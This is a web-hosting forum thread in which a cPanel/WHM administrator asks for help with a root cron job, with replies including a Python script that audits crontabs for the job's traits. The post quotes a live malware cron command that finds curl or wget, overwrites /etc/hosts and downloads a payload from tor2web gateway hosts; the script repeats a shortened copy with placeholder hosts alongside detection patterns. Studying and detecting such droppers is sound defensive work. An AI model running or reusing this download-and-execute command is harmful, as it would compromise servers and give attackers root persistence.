Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I'm receiving attacks on my server, every minute. The only information I got is the cron daemon reports from the server.

Find below:
Cron <root@pateng> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no

I've already blocked more than 30 IPs on CPanel, and it's still going!
I've even used htaccess to block all IPs except mine, and still nothing.

From the above information, I can extract the following domains:
https://an7kmd2wp4xo7hpr.tor2web.su
https://an7kmd2wp4xo7hpr.tor2web.io
https://an7kmd2wp4xo7hpr.onion.sh

On one of my searches, I've found something in a forum about a security hole in one of the CPanel plugins being actively exploited in the last few hours...

What can I do guys?
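The job in the cron report above is the persistence mechanism: a root cron entry that locates a working curl or wget binary, blanks /etc/hosts if it contains .onion entries, and fetches a payload through tor2web gateways into a hidden path under /root/.cache. Blocking inbound IPs, .htaccess rules and Apache request timeouts only affect incoming HTTP connections; they do nothing to an outbound download started by root's own cron. The first useful step is to find every cron entry carrying these indicators (root crontab, /var/spool/cron, /etc/crontab, /etc/cron.d). The following audit script is an added example for this thread, not code from the original post or from cPanel/WHM. The sample crontab is constructed; its dropper entry is a shortened stand-in for the job quoted above with the onion host name replaced by a placeholder, and the indicator patterns and two-hit threshold are my own choices.

```python
"""Flag cron jobs that show the traits of the tor2web dropper quoted in this thread.

Added example (not cPanel/WHM code). Feed it the output of `crontab -l -u root`
or the contents of /etc/crontab, /etc/cron.d/* or /var/spool/cron/*.
"""
import re
import sys

# (indicator name, pattern). One hit is worth a look; several on one entry
# is a strong sign of a download-and-run job rather than housekeeping.
INDICATORS = [
    ("tor2web / onion gateway", re.compile(r"tor2web\.\w+|\.onion\.\w+", re.I)),
    ("overwrites /etc/hosts", re.compile(r">\s*/etc/hosts")),
    ("hidden dropper path under /root/.cache", re.compile(r"/root/\.cache/\.\w+")),
    ("TLS verification disabled", re.compile(r"--no-check-certificate|--insecure|\s-[a-zA-Z]*k\b")),
    ("hunts for curl/wget binaries via strings", re.compile(r"strings\s+\$f.*CURLOPT_VERBOSE|bug-wget@gnu\.org")),
    ("curl||wget fallback download chain", re.compile(r"\|\|\s*(\$\{?)?(curl|wget)")),
]

# Constructed sample: two benign jobs, an @keyword job, and a shortened stand-in
# for the dropper quoted in the question (onion host name is a placeholder).
SAMPLE_CRONTAB = """
MAILTO=root
# nightly housekeeping
0 3 * * * /usr/bin/certbot renew --quiet
*/30 * * * * /usr/bin/rsync -a /home/ /backup/
@daily /usr/bin/updatedb
* * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (curl -fsSLk --retry 2 https://PLACEHOLDER-ONION-ID.tor2web.su/src/ldm -o /root/.cache/.ntp||wget --quiet --no-check-certificate https://PLACEHOLDER-ONION-ID.onion.sh/src/ldm -O /root/.cache/.ntp)
"""


def parse_cron_lines(text):
    """Return [(schedule, command)] for each job line in a user-crontab dump.

    Comments, blank lines and KEY=value environment lines are skipped. Both the
    five-field schedule form and the @reboot/@daily keyword form are handled.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):
            fields = line.split(None, 1)
            if len(fields) == 2:
                jobs.append((fields[0], fields[1]))
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            jobs.append((" ".join(fields[:5]), fields[5]))
    return jobs


def audit_job(command):
    """Return the names of every indicator that matches one cron command."""
    return [name for name, pattern in INDICATORS if pattern.search(command)]


def audit_crontab(text, threshold=2):
    """Return [(schedule, command, hits)] for jobs with at least `threshold` hits."""
    findings = []
    for schedule, command in parse_cron_lines(text):
        hits = audit_job(command)
        if len(hits) >= threshold:
            findings.append((schedule, command, hits))
    return findings


if __name__ == "__main__":
    # Audit a crontab dump from stdin, or the constructed sample when run bare.
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for schedule, command, hits in audit_crontab(source):
        print(f"[{schedule}] {command[:70]}...")
        for hit in hits:
            print(f"    - {hit}")
```

Run it as `crontab -l -u root | python3 audit_cron.py`, then repeat for each file under /etc/cron.d and /var/spool/cron. Removing the entry alone is rarely enough: the payload already written to /root/.cache (the `.ntp` file in the report) should be preserved for analysis, the server treated as compromised at root level, and the initial entry point (the question mentions an actively exploited cPanel plugin) closed before the machine goes back into service.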

Super User II

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

Hello 

You can permanently block the offending IP with this command (replace xxx.xxx.xxx.xxx with the attacker's IP address).

If a software or dedicated hardware firewall isn't available from your host, you can always harden Apache on your web server, which will help your server identify and automatically block malicious connections like these. You'll want to install the mod_reqtimeout module for Apache.

 

Zulfiqar Anees | GoDaddy PRO | Founder/CEO at TechMag, ZulWeb, Enter To Study

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I did install the mod_reqtimeout module, and it's still going, now with more than 2k emails from the cron daemon...

Any other ideas?

Much appreciated!

Super User II
Solution

Re: Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

Thank you 

 

Zulfiqar Anees | GoDaddy PRO | Founder/CEO at TechMag, ZulWeb, Enter To Study